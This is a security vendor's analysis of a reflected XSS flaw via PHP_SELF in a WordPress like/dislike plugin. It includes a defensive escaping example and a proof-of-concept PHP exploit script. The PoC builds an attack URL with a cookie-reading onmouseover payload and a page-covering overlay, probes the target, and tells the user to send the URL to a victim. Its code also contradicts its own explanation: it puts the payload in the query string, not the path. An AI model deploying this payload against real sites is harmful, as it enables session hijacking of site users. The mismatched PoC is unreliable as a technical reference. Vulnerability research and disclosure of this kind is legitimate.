Atomic Edge analysis of CVE-2025-14130 (metadata-based):
The Post Like Dislike WordPress plugin version 1.0 contains a reflected cross-site scripting vulnerability. This vulnerability exists in all plugin versions up to and including 1.0. The vulnerability allows unauthenticated attackers to inject malicious scripts via the PHP_SELF server variable. The CVSS 3.1 score of 6.1 indicates medium severity with impacts on confidentiality and integrity.
Atomic Edge research indicates the root cause is insufficient input sanitization and output escaping of the $_SERVER['PHP_SELF'] variable. The plugin likely echoes this variable directly into HTML output without proper escaping. This inference comes from the CWE-79 classification and the vulnerability description. Without access to source code, Atomic Edge cannot confirm the exact vulnerable file or line numbers. The vulnerability description explicitly identifies PHP_SELF as the attack vector.
Exploitation requires an attacker to craft a malicious URL whose path component carries a JavaScript payload; PHP_SELF is built from the script name plus any trailing path segment, so the payload is reflected through it rather than through a query parameter. The attacker must trick a victim into clicking the link or visiting the malicious page. The payload executes in the victim's browser context when the vulnerable plugin page loads. The exact endpoint is not specified in the metadata, but WordPress plugins commonly use admin pages accessible via /wp-admin/admin.php?page=post-like-dislike or similar plugin-specific admin interfaces.
Remediation requires proper output escaping of the PHP_SELF variable before echoing it to HTML. WordPress provides esc_url() (for URL contexts such as form action or href attributes) and esc_attr() (for other attribute values) for this purpose. The plugin should apply these functions wherever PHP_SELF appears in output. Input validation is not applicable here since PHP_SELF is a server variable derived from the request URI.
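As an added illustration (not the plugin's code, since the vulnerable file is unknown), the echo pattern the analysis infers beside a hardened version. The function names are hypothetical, and htmlspecialchars() with ENT_QUOTES stands in for esc_attr() so the script runs outside WordPress:

```php
<?php
// Hypothetical reconstruction of the unsafe pattern, not the plugin's code.
// htmlspecialchars() stands in for WordPress esc_attr() so this runs alone;
// inside a plugin, esc_url() for action/href values or esc_attr() is the fix.

// Vulnerable: PHP_SELF (script name plus PATH_INFO) lands in an attribute raw.
function render_form_vulnerable(string $php_self): string
{
    return '<form method="post" action="' . $php_self . '"></form>';
}

// Hardened: escape for the attribute context; ENT_QUOTES covers ' and ".
function render_form_hardened(string $php_self): string
{
    $safe = htmlspecialchars($php_self, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form method="post" action="' . $safe . '"></form>';
}

// Parse the markup the way a browser would and list the form's attribute
// names, which shows whether injected text became new attributes.
function form_attribute_names(string $html): array
{
    $doc = new DOMDocument();
    libxml_use_internal_errors(true);   // tolerate the bare fragment
    $doc->loadHTML($html);
    libxml_clear_errors();
    $form = $doc->getElementsByTagName('form')->item(0);
    $names = [];
    foreach ($form->attributes as $attr) {
        $names[] = $attr->name;
    }
    return $names;
}

// Constructed hostile PATH_INFO: closes the action attribute and appends more.
$hostile = '/wp-admin/admin.php/" onmouseover=alert(1) x="';

print_r(form_attribute_names(render_form_vulnerable($hostile)));
print_r(form_attribute_names(render_form_hardened($hostile)));
echo render_form_hardened($hostile), "\n";
```

In the vulnerable listing the parser reports onmouseover and x as attributes of the form, while the hardened listing reports only method and action because the quotes were encoded and the value stayed inside the attribute.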
Successful exploitation allows attackers to execute arbitrary JavaScript in the victim’s browser. Attackers can steal session cookies, perform actions as the authenticated user, or redirect users to malicious sites. The vulnerability requires user interaction, limiting its impact compared to stored XSS. The scope change (S:C in CVSS) indicates the vulnerability can affect other browser security contexts beyond the immediate page.
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14130 - Post Like Dislike <= 1.0 - Reflected Cross-Site Scripting via $_SERVER['PHP_SELF']
<?php
/**
* Proof of Concept for CVE-2025-14130
* This script demonstrates reflected XSS via PHP_SELF in Post Like Dislike plugin.
* Since exact vulnerable endpoint is unknown, this PoC targets common WordPress admin patterns.
* Assumptions:
* 1. Plugin has an admin page accessible via /wp-admin/admin.php?page=post-like-dislike
* 2. The PHP_SELF variable is echoed without escaping on this page
* 3. The vulnerability affects unauthenticated users (PR:N in CVSS)
*/
$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php';
// XSS payload that triggers an alert and demonstrates cookie theft potential
$payload = '/wp-admin/admin.php/\'" onmouseover=alert(document.cookie) style=\'display:block;width:100%;height:100%;position:fixed;top:0;left:0;z-index:999999;\' "';
// Construct malicious URL with payload in path component (affects PHP_SELF)
$attack_url = $target_url . '?page=post-like-dislike' . $payload;
// Display the attack URL
echo "Atomic Edge CVE-2025-14130 Proof of Concept\n";
echo "============================================\n";
echo "Target: " . $target_url . "\n";
echo "Attack URL: " . $attack_url . "\n\n";
// Optional: Test if the endpoint exists (without triggering XSS)
echo "Testing endpoint availability...\n";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '?page=post-like-dislike');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code == 200) {
    echo "Endpoint appears accessible (HTTP 200).\n";
    echo "Send the Attack URL to a victim user. When visited, the XSS payload will execute.\n";
} else {
    echo "Endpoint returned HTTP $http_code. The plugin admin page may not be at this location.\n";
    echo "Try alternative paths like /wp-admin/options-general.php?page=post-like-dislike\n";
}
// Note: This PoC does not automatically exploit the vulnerability
// It only generates the attack URL for demonstration purposes
echo "\nNote: Actual exploitation requires user interaction (UI:R in CVSS).\n";
?>